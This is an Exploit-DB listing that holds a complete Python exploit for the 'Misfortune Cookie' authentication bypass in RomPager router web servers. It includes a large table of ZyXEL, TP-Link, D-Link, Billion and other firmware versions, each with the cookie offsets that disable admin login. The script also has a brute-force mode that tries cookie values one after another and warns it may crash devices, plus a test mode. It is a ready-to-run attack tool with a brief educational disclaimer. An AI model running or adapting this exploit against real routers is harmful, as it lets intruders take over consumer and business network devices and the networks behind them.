RomPager 4.34 (Multiple Router Vendors) - 'Misfortune Cookie' Authentication Bypass

EDB-ID:

39739




Platform:

Hardware

Date:

2016-04-27


# Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover
# Date: 17/4/2016
# CVE: CVE-2015-9222 (http://mis.fortunecook.ie)
# Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,...
# Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf 
# Versions affected: RomPager <= 4.34 (specifically 4.07)
# Tested on : firmwares which are set as tested in the targets list
# Category: Remote Exploit
# Usage: ./exploit.py url
#	Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040

# Author: Milad Doorbash
# Email: milad.doorbash@gmail.com
# Social: @doorbash
# Blog: http://doorbash.ir

# Many Thanks to : 
# 	Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html)
#	Piotr Bania (http://piotrbania.com/all/articles/tplink_patch)
#	Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf)
# 	Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)

# Disclaimer :
#	This exploit is for testing and educational purposes only.Any other usage for this code is not allowed.
#	Author takes no responsibility for any actions with provided informations or codes.

# Description :
# 	Misfortune Cookie is a critical vulnerability that allows an intruder to remotely
# 	take over an Internet router and use it to attack home and business networks.With a few magic
#	cookies added to your request you bypass any authentication and browse the configuration
#	interface as admin, from any open port.

import requests
import sys
import time

MODE_TEST = 100000
MODE_BRUTE_FORCE = 100001

if len(sys.argv) == 1:
	print "usage: python " + sys.argv[0] + " url [enable]"
	print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040"
	exit()

url = str(sys.argv[1])
auth_byte = '\x00'
s = requests.Session()

if len(sys.argv) == 3:
	if str(sys.argv[2]) == 'enable':
		auth_byte = '\x01' # enable authenticaion again
	else:
		print "usage: python " + sys.argv[0] + " url [enable]" 
		exit()

targets = [

	["Azmoon	AZ-D140W		2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79		# tested
	["Billion	BiPAC 5102S		Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d						# ----------
	["Billion	BiPAC 5102S		Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d						# ----------
	["Billion	BiPAC 5200		2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad					# ----------
	["Billion	BiPAC 5200		2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5				# ----------
	["Billion	BiPAC 5200A		2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1					# ----------
	["Billion	BiPAC 5200A		2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51					# ----------
	["Billion	BiPAC 5200GR4		2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51			# tested
	["Billion	BiPAC 5200S		2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109					# ----------
	["Billion	BiPAC 5200SRD		2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d				# ----------
	["Billion	BiPAC 5200SRD		2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5			# ----------
	["D-Link	DSL-2520U	Z1	1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01	# tested
	["D-Link	DSL-2600U	Z1	DSL-2600U HWZ1",107366496,13], # 0x8040637d								# ----------
	["D-Link	DSL-2600U	Z2	V1.08_ras",107360133,20], # 0x803389B0									# ----------
	["TP-Link	TD-8616		V2	TD-8616_v2_080513",107371483,21], # 0x80397055							# ----------
	["TP-Link	TD-8816		V4	TD-8816_100528_Russia",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8816		V4	TD-8816_V4_100524",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8816		V5	TD-8816_100528_Russia",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8816		V5	TD-8816_V5_100524",107369790,17], # 0x803ae0b1							# tested
	["TP-Link	TD-8816		V5	TD-8816_V5_100903",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8816		V6	TD-8816_V6_100907",107371426,17], # 0x803c6e09							# ----------
	["TP-Link	TD-8816		V7	TD-8816_V7_111103",107371161,1], # 0x803e1bd5							# ----------
	["TP-Link	TD-8816		V7	TD-8816_V7_130204",107370211,5], # 0x80400c85							# ----------
	["TP-Link	TD-8817		V5	TD-8817_V5_100524",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8817		V5	TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8817		V5	TD-8817_V5_100903",107369790,17], # 0x803ae0b1							# ----------
	["TP-Link	TD-8817		V6	TD-8817_V6_100907",107369788,1], # 0x803b6e09							# ----------
	["TP-Link	TD-8817		V6	TD-8817_V6_101221",107369788,1], # 0x803b6e09							# ----------
	["TP-Link	TD-8817		V7	TD-8817_V7_110826",107369522,25], # 0x803d1bd5							# ----------
	["TP-Link	TD-8817		V7	TD-8817_V7_130217",107369316,21], # 0x80407625							# ----------
	["TP-Link	TD-8817		V7	TD-8817_v7_120509",107369321,9], # 0x803fbcc5							# tested
	["TP-Link	TD-8817		V8	TD-8817_V8_140311",107351277,20], # 0x8024E148							# Grant	Willcox	
	["TP-Link	TD-8820		V3	TD-8820_V3_091223",107369768,17], # 0x80397E69							# Chan
	["TP-Link	TD-8840T 	V1	TD-8840T_080520",107369845,5], # 0x80387055								# ----------
	["TP-Link	TD-8840T 	V2	TD-8840T_V2_100525",107369790,17], # 0x803ae0b1							# tested
	["TP-Link	TD-8840T 	V2	TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1						# ----------
	["TP-Link	TD-8840T 	V2	TD-8840T_v2_090609",107369570,1], # 0x803c65d5							# ----------
	["TP-Link	TD-8840T 	V3	TD-8840T_V3_101208",107369766,17], #0x803c3e89							# tested	
	["TP-Link	TD-8840T 	V3	TD-8840T_V3_110221",107369764,5], # 0x803d1a09							# ----------
	["TP-Link	TD-8840T 	V3	TD-8840T_V3_120531",107369688,17], # 0x803fed35							# ----------
	["TP-Link	TD-W8101G 	V1	TD-W8101G_090107",107367772,37], # 0x803bf701							# ----------
	["TP-Link	TD-W8101G 	V1	TD-W8101G_090107",107367808,21], # 0x803e5b6d							# ----------
	["TP-Link	TD-W8101G 	V2	TD-W8101G_V2_100819",107367751,21], # 0x803dc701						# ----------
	["TP-Link	TD-W8101G 	V2	TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829						# ----------
	["TP-Link	TD-W8101G 	V2	TD-W8101G_V2_101101",107367749,13], # 0x803e1829						# ----------
	["TP-Link	TD-W8101G 	V3	TD-W8101G_V3_110119",107367765,25], # 0x804bb941						# ----------
	["TP-Link	TD-W8101G 	V3	TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9						# ----------
	["TP-Link	TD-W8101G 	V3	TD-W8101G_V3_120604",107365835,1], # 0x804f16a9							# ----------
	["TP-Link	TD-W8151N	V3	TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4						# tested
	["TP-Link	TD-W8901G	V1	TD-W8901G_080522",107367787,21], # 0x803AB30D							# Piotr Bania
	["TP-Link	TD-W8901G	V1,2	TD-W8901G_080522",107368013,5], # 0x803AB30D						# ----------
	["TP-Link	TD-W8901G	V2	TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D					# ----------
	["TP-Link	TD-W8901G	V3	TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335						# tested
	["TP-Link	TD-W8901G	V3	TD-W8901G_V3_100603",107367751,21], # 0x803DC701						# chan
	["TP-Link	TD-W8901G	V3	TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701						# tested
	["TP-Link	TD-W8901G	V3	TD-W8901G_V3_100901",107367749,13], # 0x803E1829						# tested
	["TP-Link	TD-W8901G	V6	TD-W8901G_V6_110119",107367765,25], # 0x804BB941						# Chan
	["TP-Link	TD-W8901G	V6	TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9						# Chan
	["TP-Link	TD-W8901G 	V6	TD-W8901G_V6_120418",107365835,1], # 0x804F16A9							# ----------
	["TP-Link	TD-W8901G 	V6 	TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9						# ----------
	["TP-Link	TD-W8901GB	V3	TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9						# ----------
	["TP-Link	TD-W8901GB	V3	TD-W8901GB_V3_100820",107369393,21], # 0x803f1719						# ----------
	["TP-Link	TD-W8901N	V1	TD-W8901N v1_111211",107353880,0],  # 0x8034FF94						# cawan	Chui
	["TP-Link	TD-W8951ND	V1	TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61		# tested
	["TP-Link	TD-W8951ND	V1	TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9 					# ----------
	["TP-Link	TD-W8951ND	V1	TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9						# ----------
	["TP-Link	TD-W8951ND	V3	TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189					# ----------
	["TP-Link	TD-W8951ND	V3	TD-W8951ND_V3_110721",107366743,21], # 0x804ee049						# ----------
	["TP-Link	TD-W8951ND	V3	TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189					# ----------
	["TP-Link	TD-W8951ND	V4	TD-W8951ND_V4_120511",107364759,25],  # 0x80523979						# tested
	["TP-Link	TD-W8951ND	V4	TD-W8951ND_V4_120607",107364759,13], # 0x80524A91						# tested
	["TP-Link	TD-W8951ND	V4	TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859					# tested
	["TP-Link	TD-W8961NB	V1	TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1						# tested
	["TP-Link	TD-W8961NB	V1	TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1						# ----------
	["TP-Link	TD-W8961NB	V2	TD-W8961NB_V2_120319",107367629,21], # 0x80531859						# ----------
	["TP-Link	TD-W8961NB	V2	TD-W8961NB_V2_120823",107366421,13], # 0x80542e59						# ----------
	["TP-Link	TD-W8961ND	V1	TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61				# tested
	["TP-Link	TD-W8961ND	V1	TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61					# ----------
	["TP-Link	TD-W8961ND	V1	TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9						# ----------
	["TP-Link	TD-W8961ND	V2	TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9						# ----------
	["TP-Link	TD-W8961ND	V2	TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9					# ----------
	["TP-Link	TD-W8961ND	V2	TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1					# ----------
	["TP-Link	TD-W8961ND	V3	TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4					# ----------
	["TP-Link	TD-W8961ND	V3	TD-W8961ND_V3_120830",107353414,36], # 0x803605B4						# ----------
	["ZyXEL	P-660R-T3	V3	3.40(BOQ.0)C0",107369567,21], # 0x803db071									# tested
	["ZyXEL	P-660RU-T3	V3	3.40(BJR.0)C0",107369567,21], # 0x803db071									# ----------
	

# *---------- means data for this firmware is obtained from other tested firmwares.
# if you tested on your devices report to me so i can change them to tested state.
# don't forget to mention your device model and full firmware version in your reports.
# I could not gather information for every vulnerable firmwares since some vendors has removed
# vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them.
# if you want to add missing firmwares data to list you can do it by reading blog posts
# mentioned in "Many thanks to" part at the beginning.Btw please don't hesitate to contact me
# for any question or further information.

]

def request(num,n,data):
	try:
		print "\nConnecting to: " + url + "\n"
		s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"})
		r = s.get(url)
		print str(r.status_code) + "\n"
		for i in r.headers:
			print i + ": " + r.headers[i]
		return [r.status_code,r.text]
	except Exception, e:
		return 1000


def printMenu():
	print """
         __  __ _      __            _                    
        |  \/  (_)___ / _| ___  _ __| |_ _   _ _ __   ___ 
        | |\/| | / __| |_ / _ \| '__| __| | | | '_ \ / _ \			
        | |  | | \__ \  _| (_) | |  | |_| |_| | | | |  __/				
        |_|  |_|_|___/_|  \___/|_|   \__|\__,_|_| |_|\___|			
                                                          
   ____            _    _        _____            _       _ _   
  / ___|___   ___ | | _(_) ___  | ____|_  ___ __ | | ___ (_) |_ 
 | |   / _ \ / _ \| |/ / |/ _ \ |  _| \ \/ / '_ \| |/ _ \| | __|
 | |__| (_) | (_) |   <| |  __/ | |___ >  <| |_) | | (_) | | |_ 
  \____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__|
                                           |_|                 

----------------------------------------------------------------------------
"""
	for k,i in enumerate(targets):
		print str(k+1) + "- " + i[0]

	print """
0- Not sure just try them all! (may cause reboot)
T- Test misfortune cookie vulnerablity against target
B- BruteForce to find auth-remover cookie (may cause reboot)
"""
	c = 0
	while True:
		selection = raw_input("select a target: ")
		if selection == "T":
			return MODE_TEST
		elif selection == "B":
			return MODE_BRUTE_FORCE
		c = int(selection)
		if c <= len(targets):
			break
		else:
			print "bad input try again"
	return c - 1

def bruteforce():
	for i in range(107364000,107380000):
		for j in range(0,40):
			print "testing " + str(i) + " , " + str(j)
			result = request(i,j,"\x00")[0]
			if result <= 302:
				print "YEAHHH!!!!"
				print str(i) + " , " + str(j) + " is the answer!"
				return
			elif result == 1000:
				time.sleep(60)

def exploit():
	c = printMenu()
	if c < 0:
		for k,i in enumerate(targets):
			print "testing #" + str(k+1) + " ..."
			result = request(i[1],i[2],auth_byte)[0]
			if result == 1000:
				print "\n[!] Error. maybe router crashed by sending wrong cookie or it's your connection problem.waiting 60 seconds for router to reboot"
				time.sleep(60)
			elif result <= 302:
				print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
				break # some routers always return 200 (for custom login page). so maybe we should comment this line
			else:
				print "\n[!] Failed."
	else:
		if c == MODE_TEST:
			if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]:
				print "\n[!] Target is vulnerable"
			else:
				print "\n[!] Target is not vulnerable"
		elif c == MODE_BRUTE_FORCE:
			bruteforce()
		elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302:
			print "\n[!] Failed."
		else:
			print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."

exploit()